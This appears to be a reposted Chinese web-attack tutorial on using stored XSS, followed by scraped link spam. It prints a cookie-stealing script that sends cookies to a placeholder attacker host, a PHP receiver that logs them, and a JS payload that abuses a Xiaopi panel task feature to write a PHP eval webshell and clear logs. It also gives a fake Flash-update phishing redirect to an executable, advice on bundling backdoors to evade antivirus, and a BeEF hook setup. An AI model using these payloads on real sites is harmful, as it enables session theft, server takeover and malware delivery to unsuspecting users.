当前位置: 首页 > wzjs >正文

asp和php网站的区别小语言网站建设

asp和php网站的区别,小语言网站建设,在线产品设计,短视频代运营方案策划书知识点: 1、Web攻防-XSS跨站-手工代码&框架工具&在线平台 2、Web攻防-XSS跨站-Cookie盗取&数据提交&网络钓鱼 演示案例-WEB攻防-XSS跨站-Cookie盗取&数据提交&网络钓鱼&Beef工具 1、XSS跨站-攻击利用-凭据盗取 条件:无防…

知识点:
1、Web攻防-XSS跨站-手工代码&框架工具&在线平台
2、Web攻防-XSS跨站-Cookie盗取&数据提交&网络钓鱼

演示案例-WEB攻防-XSS跨站-Cookie盗取&数据提交&网络钓鱼&Beef工具

1、XSS跨站-攻击利用-凭据盗取

条件:无防护Cookie凭据获取
利用:XSS平台或手写接受代码
演示:某贷款分配系统存储XSS利用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

手工

目标上插入的XSS:
<script>var url='http://xx.xx.xx.xx/getcookie.php?u='+window.location.href+'&c='+document.cookie;document.write("<img src="+url+" />");</script>

在这里插入图片描述
在这里插入图片描述

攻击者服务器上接受脚本getcookie.php:
<?php
$url=$_GET['u'];
$cookie=$_GET['c'];
$fp = fopen('cookie.txt',"a");
fwrite($fp,$url."|".$cookie."\n");
fclose($fp);
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

平台:XSSReceiver

简单配置即可使用,无需数据库,无需其他组件支持
搭建:https://github.com/epoch99/BlueLotus_XSSReceiver-master
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、XSS跨站-攻击利用-数据提交

条件:熟悉后台业务功能数据包,利用JS写一个模拟提交
利用:凭据获取不到或有防护无法利用凭据进入时考虑
演示:小皮面板系统存储XSS提交数据包模拟写入后门文件
参考:blog.csdn.net/RestoreJustice/article/details/129735449

攻击者知道目标网站使用了什么源码,就可以自己本地部署一套同样的源码,在登录本地后台对后台一些业务功能(例如用户创建等)进行操作并截取其数据包,利用JS写一个模拟提交,当目标执行这个js就会执行攻击者想要的操作(用户创建等)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

攻击者服务器上创建poc1.js,内容为:
function poc(){
$.get('/service/app/tasks.php?type=task_list',{},function(data){var id=data.data[0].ID;
$.post('/service/app/tasks.php?type=exec_task',{
tid:id},function(res2){
$.post('/service/app/log.php?type=clearlog',{},function(res3){},"json");},"json");},"json");
}
function save(){var data=new Object();
data.task_id="";
data.title="test";
data.exec_cycle="1";
data.week="1";
data.day="3";
data.hour="14";
data.minute = "20";
data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
$.post('/service/app/tasks.php?type=save_shell',data,function(res){poc();},'json');
}
save();

在这里插入图片描述

 XSS攻击代码:<script src="http://xx.xxx.xxx/poc1.js"></script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、XSS跨站-攻击利用-网络钓鱼

项目:https://github.com/r00tSe7en/Fake-flash.cn
在这里插入图片描述

1、将后门及正常文件捆绑打包免杀(实战情况下必须要做的部分)

2、部署可访问的钓鱼页面并修改(可以用项目也可以自己手动生成)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、植入XSS代码等待受害者触发

<script>alert('当前浏览器Flash版本过低,请下载升级!');location.href='http://x.x.x.x/flash.exe'</script>//这里是直接提供了exe下载地址而没有经过钓鱼页面,如果需要经过钓鱼页面再下载exe就是不用指定flash.exe即可location.href='http://x.x.x.x/flash.exe'</script>改为location.href='http://x.x.x.x/'</script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、XSS跨站-攻击利用-浏览器控制框架-beef-xss

只需执行JS文件,即可实现对当前浏览器的控制,可配合各类手法利用
演示:阿里云 Ubuntu 16.04 x64(按量计费) HK香港服务器
apt update
apt install docker
apt install docker-compose
搭建:docker run --rm -p 3000:3000 janes/beef
访问:http://ip:3000/ui/panel (账号密码:beef/beef)

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

利用:<script src="http://ip:3000/hook.js"></script>

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


文章转载自:

http://JNSCetVF.nsjpz.cn
http://PZ3MXhzL.nsjpz.cn
http://rW9SsKMP.nsjpz.cn
http://9Yu4knum.nsjpz.cn
http://Eh8LX12E.nsjpz.cn
http://bfJoZKaE.nsjpz.cn
http://oYfzW39I.nsjpz.cn
http://SvgVDY03.nsjpz.cn
http://PVBet9mh.nsjpz.cn
http://nvTpsDvQ.nsjpz.cn
http://CtqHDPZS.nsjpz.cn
http://RCXL88OM.nsjpz.cn
http://z5rtxfdX.nsjpz.cn
http://MELSk9OD.nsjpz.cn
http://vRNSZqzw.nsjpz.cn
http://se4N8460.nsjpz.cn
http://Ah96ftCg.nsjpz.cn
http://gpkzYxA0.nsjpz.cn
http://5y74fBW8.nsjpz.cn
http://BNxTjPnM.nsjpz.cn
http://kWpUSrfe.nsjpz.cn
http://oLuNsfxq.nsjpz.cn
http://TM9xqXHT.nsjpz.cn
http://cmd6f1CF.nsjpz.cn
http://vKrna2TQ.nsjpz.cn
http://YQ4yu4qc.nsjpz.cn
http://P6Ls6tqk.nsjpz.cn
http://LmJDOPT1.nsjpz.cn
http://b5JhoFkp.nsjpz.cn
http://Tefka6V9.nsjpz.cn
http://www.dtcms.com/wzjs/689963.html

相关文章:

  • 绝味鸭脖网站建设规划书宿州商务网站建设
  • 网站备案网站名称网站开发专业就业前景分析
  • 宁波住房和建设局网站怎么做蛋糕
  • 微网站难做么微信怎么推广
  • 文化传媒公司 网站备案跨境电商无货源模式怎么做
  • 郑州seo网站推广桂林市建设局网站
  • 怎样成立网站dw软件怎么用怎么做网页
  • 哪里可以做拍卖网站最新新闻热点国家大事
  • 网站备案用的幕布可以淘宝做吗网站显示系统建设中
  • 阿里云对象存储做静态网站网站建设 名词解释
  • 视频网站开发与制作wordpress 改成 中文
  • 门户网站建设厂商名录无广告自助建站
  • 开源网站系统信阳哪里做网站
  • 四川省建设注册资格中心网站网上电影网站怎么做的
  • 现在做什么网站好温州网站建设制作
  • 如何查看网站的空间做一个简单的网站
  • 做网站第三方登录怎么弄做一个平台网站要多少钱
  • 怎么给网站做懒加载做网站泰州
  • 网站举报入口做网站如何组建域名
  • 淄博张店做网站的公司中材矿山建设有限公司网站
  • 怎么建设国外免费网站公司如何建站
  • 网站单向外链推广工具微网站如何做微信支付
  • 开发做一个网站的流程多用户商城网站开发
  • 网站首页包含的内容网站建设要学哪些软件有哪些方面
  • 大型网站建设培训课件网站关键词多少合适
  • 山东建设企业网站网站托管做的好的公司
  • html网页设计作业源代码福州网站设计十年乐云seo
  • jsp购物网站开发教程wordpress 文章 两边
  • 网站服务器平台17网站一起做网店如何下单
  • 长春企业网站制作优化做网站策划遇到的问题